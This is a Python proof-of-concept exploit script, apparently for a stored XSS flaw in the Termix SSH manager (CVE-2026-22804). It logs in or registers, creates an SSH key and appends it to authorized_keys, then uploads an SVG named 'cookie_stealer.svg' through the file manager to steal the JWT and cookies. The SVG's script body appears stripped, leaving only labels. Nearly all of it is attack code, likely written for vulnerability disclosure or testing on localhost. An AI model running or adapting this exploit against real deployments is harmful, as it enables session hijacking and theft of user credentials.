import requests import json import base64 import time import sys import argparse import os import subprocess BASE_URL_AUTH = "http://localhost:30001" BASE_URL_FILE = "http://localhost:30004" def parse_args(): parser = argparse.ArgumentParser(description="Termix XSS Exploit") parser.add_argument("--user", default="admin", help="Username for Termix auth") parser.add_argument("--pass", dest="password", default="password123", help="Password for Termix auth") return parser.parse_args() def login_or_register(username, password): session = requests.Session() try: print(f"[*] Attempting to login as {username}...") res = session.post(f"{BASE_URL_AUTH}/users/login", json={ "username": username, "password": password }) if res.status_code == 200: print("[+] Login successful") token = res.json().get("token") session.headers.update({"Authorization": f"Bearer {token}"}) return session, res.json().get("userId") print("[-] Login failed, attempting registration...") except requests.exceptions.ConnectionError: print(f"[!] Could not connect to {BASE_URL_AUTH}. Is the backend running?") sys.exit(1) try: res = session.post(f"{BASE_URL_AUTH}/users/create", json={ "username": username, "password": password }) if res.status_code == 201 or res.status_code == 200: print("[+] Registration successful") res = session.post(f"{BASE_URL_AUTH}/users/login", json={ "username": username, "password": password }) token = res.json().get("token") session.headers.update({"Authorization": f"Bearer {token}"}) return session, res.json().get("userId") else: print(f"[!] Registration failed: {res.text}") sys.exit(1) except Exception as e: print(f"[!] Error: {e}") sys.exit(1) def get_or_create_host(session, user_id): print("[*] getting SSH hosts...") res = session.get(f"{BASE_URL_AUTH}/ssh/db/host") if res.status_code != 200: print(f"[-] Failed to get hosts. Status: {res.status_code}, Body: {res.text}") return None try: hosts = res.json() except json.JSONDecodeError: print(f"[-] JSON Decode Error. Body: {res.text}") sys.exit(1) target_host_name = "Localhost PoC Custom" if hosts: for host in hosts: if host['name'] == target_host_name: print(f"[+] Found existing custom host: {host['name']}. Deleting to ensure clean state...") del_res = session.delete(f"{BASE_URL_AUTH}/ssh/db/host/{host['id']}") if del_res.status_code != 200: print(f"[-] Failed to delete host: {del_res.status_code}") break print("[*] Custom host not found. Creating it...") key_path = "/home/kali/CVE-2026-22804/poc_key" if not os.path.exists(key_path): print(f"[*] generating ssh key: {key_path}") subprocess.run(["ssh-keygen", "-f", key_path, "-t", "rsa", "-N", ""]) pub_key_path = f"{key_path}.pub" auth_keys_path = os.path.expanduser("~/.ssh/authorized_keys") if os.path.exists(pub_key_path): with open(pub_key_path, "r") as f: pub_key = f.read().strip() os.makedirs(os.path.dirname(auth_keys_path), exist_ok=True) current_keys = "" if os.path.exists(auth_keys_path): with open(auth_keys_path, "r") as f: current_keys = f.read() if pub_key not in current_keys: print("[*] Adding generated key to authorized_keys...") with open(auth_keys_path, "a") as f: f.write(f"\n{pub_key}\n") host_data = { "userId": user_id, "name": target_host_name, "ip": "127.0.0.1", "port": 22, "username": "kali", "authType": "key", "key": open("/home/kali/CVE-2026-22804/poc_key").read(), "tags": ["poc"], "pin": 0, "enableTerminal": 1, "enableFileManager": 1, "enableTunnel": 0, "forceKeyboardInteractive": False } res = session.post(f"{BASE_URL_AUTH}/ssh/db/host", json=host_data) if res.status_code == 200 or res.status_code == 201: print("[+] Created localhost host.") return res.json() else: print(f"[!] Failed to create host: {res.status_code} {res.text}") sys.exit(1) def connect_ssh(session, host): print(f"[*] Connecting to {host['name']} ({host['ip']})...") host_id = host['id'] session_id = str(host_id) payload = { "sessionId": session_id, "hostId": host_id, "ip": host['ip'], "port": host['port'], "username": host['username'], "authType": host['authType'], "userId": host.get('userId') } if host.get('key'): payload['sshKey'] = host['key'] if host.get('authType') == 'password': payload['password'] = host.get('password', 'kali') try: res = session.post(f"{BASE_URL_FILE}/ssh/file_manager/ssh/connect", json=payload) if res.status_code == 200 or res.status_code == 201: print(f"[+] SSH Connection initiated. Response: {res.text}") time.sleep(2) status_res = session.get(f"{BASE_URL_FILE}/ssh/file_manager/ssh/status", params={"sessionId": session_id}) print(f"[*] Status Check: {status_res.status_code} {status_res.text}") if status_res.status_code == 200 and status_res.json().get("connected"): print("[+] SSH Connected successfully!") return session_id else: print("[-] SSH Connection status is false. Maybe auth failed?") print(f"DEBUG: Session ID used: {session_id}") return None else: print(f"[-] Connect failed: {res.status_code} {res.text}") except Exception as e: print(f"[!] Connection error: {e}") return session_id def upload_poc(session, session_id, host_id, user_id): filename = "cookie_stealer.svg" content = """
SESSION HIJACKED!

JWT (localStorage):

Cookies:
""" payload = { "sessionId": session_id, "path": "/home/kali", "fileName": filename, "content": content, "hostId": host_id, "userId": user_id } print(f"[*] Uploading {filename}...") res = session.post(f"{BASE_URL_FILE}/ssh/file_manager/ssh/uploadFile", json=payload) if res.status_code == 200: print(f"[+] File uploaded successfully!") print(f"[+] Check File Manager at /home/kali/{filename} to verify XSS.") else: print(f"[-] Upload failed: {res.status_code} {res.text}") def main(): args = parse_args() session, user_id = login_or_register(args.user, args.password) host = get_or_create_host(session, user_id) session_id = connect_ssh(session, host) if session_id: upload_poc(session, session_id, host['id'], user_id) if __name__ == "__main__": main()